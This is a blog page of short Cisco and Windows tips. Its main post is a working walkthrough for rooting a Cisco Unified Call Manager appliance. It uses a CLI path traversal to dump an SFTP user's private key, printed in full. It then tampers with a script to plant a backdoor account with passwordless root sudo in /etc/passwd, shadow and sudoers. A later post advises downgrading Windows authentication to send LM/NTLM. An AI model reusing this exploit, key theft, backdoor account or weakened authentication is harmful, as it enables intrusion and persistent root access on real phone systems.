Jailbreak Cisco Unified Call Manager

Jailbreak Cisco Unified Call Manager

by | Jul 15, 2010 | Appliances, Cisco, Hardware

  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user: 
    admin:file dump sftpdetails ../.ssh/id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
+6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
PSfhcQWR3rOKaYUD85henvE=
-----END DSA PRIVATE KEY-----
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example. 
    C:\>copy con c:\temp\id.ots
-----BEGIN DSA PRIVATE KEY-----
MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
+6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
PSfhcQWR3rOKaYUD85henvE=
-----END DSA PRIVATE KEY-----
^Z
        1 file(s) copied.
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using: 
    C:\> puttygen c:\TEMP\id.ots

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team: 
    C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
Using username "sftpuser".
Remote working directory is /home/sftpuser
psftp>
  6. Get the file sftp_connect.sh: 
    psftp> get sftp_connect.sh
remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
psftp>exit
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task. 
    chattr -i /etc/passwd
chattr -i /etc/shadow
echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
chattr +i /etc/passwd
chattr +i /etc/shadow
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh: 
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
Using username "sftpuser".
Remote working directory is /home/sftpuser
psftp> del sftp_connect.sh
rm /home/sftpuser/sftp_connect.sh: OK
psftp> put sftp_connect.sh
local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
psftp> chmod 555 sftp_connect.sh
/home/sftpuser/sftp_connect.sh: 0644 -> 0555
psftp>exit
  9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question. 
    admin:file get tftp os7920.txt
Please wait while the system is gathering files info ...done.
Sub-directories were not traversed.
Number of files affected: 1
Total size in Bytes: 22
Total size in Kbytes: 0.021484375
Would you like to proceed [y/n]? y
SFTP server IP: doesNotMatter
SFTP server port [22]:
User ID: SoonToBeRoot
Password: ***

Download directory: InYourFace

Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
admin:
  10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash: 
    login as: jail
[email protected]'s password:

-bash-3.00$ sudo /bin/bash
bash-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash-3.00#
Cisco ATA 186 and 10.1.1.1

Cisco ATA 186 and 10.1.1.1

by | May 11, 2010 | Cisco, Hardware

If you notice any issues on your firewall regarding your ATA 186, it’s most likely because of a factory hardware error that causes the ATA to try to create a route to a nonexistent CCM at 10.1.1.1 as a backup. Find the IP of your ATA and type it in your browser and add /dev behind the url. On the SCCP page, change both CCM addresses to your addresses. If you only have 1 CCM, put it in both boxes.

cannot map to DFS/IFS shares on vista/7/8

cannot map to DFS/IFS shares on vista/7/8

by | Mar 9, 2010 | AS400, Security, Windows 7, Windows 8, Windows Vista

On your Vista/7/8 PC do the following:

1) Click All Programs-Accessories-Run and type secpol.msc and click OK.

2) Verify if dialog box appears.

3) From Security Settings console tree, expand Local Policies then click Security Options.

4) In the right pane, scroll down to the setting called ‘Network security:Lan Manager authentication level Properties’ and double-click it.

5) Note the current value and change it to be ‘Send LM & NTLM – use NTLMv2 session security if negotiated’.

You should now be able to access network shares on any DFS/IFS system such as an AS/400.